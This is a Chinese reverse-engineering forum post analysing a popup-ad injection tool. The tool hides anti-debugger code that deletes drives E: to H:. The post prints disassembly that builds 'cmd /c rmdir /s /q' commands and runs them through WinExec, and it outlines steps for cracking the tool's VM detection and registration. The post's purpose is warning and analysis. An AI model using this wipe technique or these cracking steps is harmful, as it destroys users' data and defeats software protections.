软件加弹窗工具能将EXE文件中加入弹窗,运行软件的同时就会打开您的网站,
可以轻松为您的网站带来流量!
支持插入任意多个弹窗:
支持超长网址 支持多种方案选择 支持弹出站内连接 支持加过壳的文件 支持退弹 支持隐藏浏览 支持自动升级 支持拖拽文件 支持WIN7系统流量三部曲:
寻找软件插入弹窗->发布软件->网站流量提升
---------------------------------------------------------
源程序只对逆向人员有威胁,一般人不会有特别影响,可想而知作者对逆向人员有偏见啊,这样是不行的。
本想写段详细分析的,现在觉得没必要写太多,提醒一点[font=""]rmdir就可以了,估计新手都可以秒破了。
源程序里作者用到了[font=""]rmdir。【逆向朋友们注意看啦!比熊猫烧香还要毒百倍。被格了都不知道就杯具了。】
[font=""]rmdir命令详细分析[font=""]
请看源程序里的一段代码:
004040A0 /$ 83EC 60 sub esp,0x60
004040A3 |. 53 push ebx
004040A4 |. B3 64 mov bl,0x64
004040A6 |. B0 20 mov al,0x20
004040A8 |. B1 2F mov cl,0x2F
004040AA |. B2 72 mov dl,0x72
004040AC |. 56 push esi
004040AD |. C64424 08 63 mov byte ptr ss:[esp+0x8],0x63
004040B2 |. C64424 09 6D mov byte ptr ss:[esp+0x9],0x6D
004040B7 |. 885C24 0A mov byte ptr ss:[esp+0xA],bl
004040BB |. 884424 0B mov byte ptr ss:[esp+0xB],al
004040BF |. 884C24 0C mov byte ptr ss:[esp+0xC],cl
004040C3 |. C64424 0D 63 mov byte ptr ss:[esp+0xD],0x63
004040C8 |. 884424 0E mov byte ptr ss:[esp+0xE],al
004040CC |. 885424 0F mov byte ptr ss:[esp+0xF],dl
004040D0 |. C64424 10 6D mov byte ptr ss:[esp+0x10],0x6D
004040D5 |. 885C24 11 mov byte ptr ss:[esp+0x11],bl
004040D9 |. C64424 12 69 mov byte ptr ss:[esp+0x12],0x69
004040DE |. 885424 13 mov byte ptr ss:[esp+0x13],dl
004040E2 |. 884424 14 mov byte ptr ss:[esp+0x14],al
004040E6 |. 884C24 15 mov byte ptr ss:[esp+0x15],cl
004040EA |. C64424 16 73 mov byte ptr ss:[esp+0x16],0x73
004040EF |. 884424 17 mov byte ptr ss:[esp+0x17],al
004040F3 |. 884C24 18 mov byte ptr ss:[esp+0x18],cl
004040F7 |. C64424 19 71 mov byte ptr ss:[esp+0x19],0x71
004040FC |. 884424 1A mov byte ptr ss:[esp+0x1A],al
00404100 |. C64424 1B 65 mov byte ptr ss:[esp+0x1B],0x65
00404105 |. C64424 1C 3A mov byte ptr ss:[esp+0x1C],0x3A
0040410A |. C64424 1D 5C mov byte ptr ss:[esp+0x1D],0x5C
0040410F |. C64424 1E 00 mov byte ptr ss:[esp+0x1E],0x0
00404114 |. C64424 20 63 mov byte ptr ss:[esp+0x20],0x63
00404119 |. C64424 21 6D mov byte ptr ss:[esp+0x21],0x6D
0040411E |. 885C24 22 mov byte ptr ss:[esp+0x22],bl
00404122 |. 884424 23 mov byte ptr ss:[esp+0x23],al
00404126 |. 884C24 24 mov byte ptr ss:[esp+0x24],cl
0040412A |. C64424 25 63 mov byte ptr ss:[esp+0x25],0x63
0040412F |. 884424 26 mov byte ptr ss:[esp+0x26],al
00404133 |. 885424 27 mov byte ptr ss:[esp+0x27],dl
00404137 |. C64424 28 6D mov byte ptr ss:[esp+0x28],0x6D
0040413C |. 885C24 29 mov byte ptr ss:[esp+0x29],bl
00404140 |. C64424 2A 69 mov byte ptr ss:[esp+0x2A],0x69
00404145 |. 885424 2B mov byte ptr ss:[esp+0x2B],dl
00404149 |. 884424 2C mov byte ptr ss:[esp+0x2C],al
0040414D |. 884C24 2D mov byte ptr ss:[esp+0x2D],cl
00404151 |. C64424 2E 73 mov byte ptr ss:[esp+0x2E],0x73
00404156 |. 884424 2F mov byte ptr ss:[esp+0x2F],al
0040415A |. 884C24 30 mov byte ptr ss:[esp+0x30],cl
0040415E |. C64424 31 71 mov byte ptr ss:[esp+0x31],0x71
00404163 |. 884424 32 mov byte ptr ss:[esp+0x32],al
00404167 |. C64424 33 66 mov byte ptr ss:[esp+0x33],0x66
0040416C |. C64424 34 3A mov byte ptr ss:[esp+0x34],0x3A
00404171 |. C64424 35 5C mov byte ptr ss:[esp+0x35],0x5C
00404176 |. C64424 36 00 mov byte ptr ss:[esp+0x36],0x0
0040417B |. C64424 38 63 mov byte ptr ss:[esp+0x38],0x63
00404180 |. C64424 39 6D mov byte ptr ss:[esp+0x39],0x6D
00404185 |. 885C24 3A mov byte ptr ss:[esp+0x3A],bl
00404189 |. 884424 3B mov byte ptr ss:[esp+0x3B],al
0040418D |. 884C24 3C mov byte ptr ss:[esp+0x3C],cl
00404191 |. C64424 3D 63 mov byte ptr ss:[esp+0x3D],0x63
00404196 |. 884424 3E mov byte ptr ss:[esp+0x3E],al
0040419A |. 885424 3F mov byte ptr ss:[esp+0x3F],dl
0040419E |. C64424 40 6D mov byte ptr ss:[esp+0x40],0x6D
004041A3 |. 885C24 41 mov byte ptr ss:[esp+0x41],bl
004041A7 |. C64424 42 69 mov byte ptr ss:[esp+0x42],0x69
004041AC |. 885424 43 mov byte ptr ss:[esp+0x43],dl
004041B0 |. 884424 44 mov byte ptr ss:[esp+0x44],al
004041B4 |. 884C24 45 mov byte ptr ss:[esp+0x45],cl
004041B8 |. C64424 46 73 mov byte ptr ss:[esp+0x46],0x73
004041BD |. 884424 47 mov byte ptr ss:[esp+0x47],al
004041C1 |. 884C24 48 mov byte ptr ss:[esp+0x48],cl
004041C5 |. C64424 49 71 mov byte ptr ss:[esp+0x49],0x71
004041CA |. 884424 4A mov byte ptr ss:[esp+0x4A],al
004041CE |. C64424 4B 67 mov byte ptr ss:[esp+0x4B],0x67
004041D3 |. C64424 4C 3A mov byte ptr ss:[esp+0x4C],0x3A
004041D8 |. C64424 4D 5C mov byte ptr ss:[esp+0x4D],0x5C
004041DD |. C64424 4E 00 mov byte ptr ss:[esp+0x4E],0x0
004041E2 |. C64424 50 63 mov byte ptr ss:[esp+0x50],0x63
004041E7 |. C64424 51 6D mov byte ptr ss:[esp+0x51],0x6D
004041EC |. 885C24 52 mov byte ptr ss:[esp+0x52],bl
004041F0 |. 884424 53 mov byte ptr ss:[esp+0x53],al
004041F4 |. 884C24 54 mov byte ptr ss:[esp+0x54],cl
004041F8 |. C64424 55 63 mov byte ptr ss:[esp+0x55],0x63
004041FD |. 8B35 F8A24300 mov esi,dword ptr ds:[; kernel32.WinExec
00404203 |. 884424 56 mov byte ptr ss:[esp+0x56],al
00404207 |. 884424 5C mov byte ptr ss:[esp+0x5C],al
0040420B |. 884424 5F mov byte ptr ss:[esp+0x5F],al
0040420F |. 884424 62 mov byte ptr ss:[esp+0x62],al
00404213 |. 8D4424 08 lea eax,dword ptr ss:[esp+0x8] ; cmd /c rmdir /s /q e:\
00404217 |. 6A 05 push 0x5 ; /ShowState = SW_SHOW
00404219 |. 50 push eax ; |cmdLine="cmd /c rmdir /s /q e:\"
0040421A |. 885424 5F mov byte ptr ss:[esp+0x5F],dl ; |
0040421E |. C64424 60 6D mov byte ptr ss:[esp+0x60],0x6D ; |
00404223 |. 885C24 61 mov byte ptr ss:[esp+0x61],bl ; |
00404227 |. C64424 62 69 mov byte ptr ss:[esp+0x62],0x69 ; |
0040422C |. 885424 63 mov byte ptr ss:[esp+0x63],dl ; |
00404230 |. 884C24 65 mov byte ptr ss:[esp+0x65],cl ; |
00404234 |. C64424 66 73 mov byte ptr ss:[esp+0x66],0x73 ; |
00404239 |. 884C24 68 mov byte ptr ss:[esp+0x68],cl ; |
0040423D |. C64424 69 71 mov byte ptr ss:[esp+0x69],0x71 ; |
00404242 |. C64424 6B 68 mov byte ptr ss:[esp+0x6B],0x68 ; |
00404247 |. C64424 6C 3A mov byte ptr ss:[esp+0x6C],0x3A ; |
0040424C |. C64424 6D 5C mov byte ptr ss:[esp+0x6D],0x5C ; |
00404251 |. C64424 6E 00 mov byte ptr ss:[esp+0x6E],0x0 ; |
00404256 |. FFD6 call esi ; \WinExec
00404258 |. 8D4C24 20 lea ecx,dword ptr ss:[esp+0x20] ; cmd /c rmdir /s /q f:\
0040425C |. 6A 05 push 0x5 ; /ShowState = SW_SHOW
0040425E |. 51 push ecx ; |cmdLine="cmd /c rmdir /s /q f:\"
0040425F |. FFD6 call esi ; \WinExec
00404261 |. 8D5424 38 lea edx,dword ptr ss:[esp+0x38] ; cmd /c rmdir /s /q g:\
00404265 |. 6A 05 push 0x5 ; /ShowState = SW_SHOW
00404267 |. 52 push edx ; |cmdLine="cmd /c rmdir /s /q g:\"
00404268 |. FFD6 call esi ; \WinExec
0040426A |. 8D4424 50 lea eax,dword ptr ss:[esp+0x50] ; cmd /c rmdir /s /q h:\
0040426E |. 6A 05 push 0x5 ; /ShowState = SW_SHOW
00404270 |. 50 push eax ; |CmdLine = "cmd /c rmdir /s /q h:\"
00404271 |. FFD6 call esi ; \cmdLine="cmd /c rmdir /s /q h:\"
00404273 |. 5E pop esi
00404274 |. 5B pop ebx
00404275 |. 83C4 60 add esp,0x60
00404278 \. C3 retn
除了C盘基本上都干掉了,很邪恶吧....水平不高思想邪恶....
需要学习的,到他官网下载,但一定要注意安全性,在虚拟机下进行调试安全点哦。
------------------------------------------------------
声明:
1.原程序含有很大危险性的格盘命令,检测到OD,W32等多种逆向工具就秒格啦,逆向的朋友们要注意啦
!!
2.本人发布的已经屏蔽了格盘命令,不会再发生格盘效果!为了保留格盘证据完整封印在软件里,对逆向
工程师有一定的威胁性。
3.只在吾爱破解发布!!!不是在吾爱下载的请注意安全性。
4.作者非常的邪恶,摆明公开挑战逆向人员。要想不被调试就不要写软件!
5.此软件献给本群 广西╰→剑哥 ,他是第一个受害者,为你默哀三分钟,哈哈。
6.未经本人同意不得转载。
by 小叨
[attachment=125919] 2011年7月7日
在论坛的坛友强烈要求下,发出小叨和谐版,这个是完全破解版。
大家破解这个应该不是很难的,动动手啊,晕..
破解思路:
虚拟机下破解,运行软件在系统临时文件里会出现一个TXT文件【楼下有回帖,自己查看】,先去掉检测虚拟机,再去掉格盘命令,注册直接拦截提示直达啦。
和谐版声明:
1.完全去除格盘命令
2.不鼓励大家用这个软件,只供完全破解后的样品参考。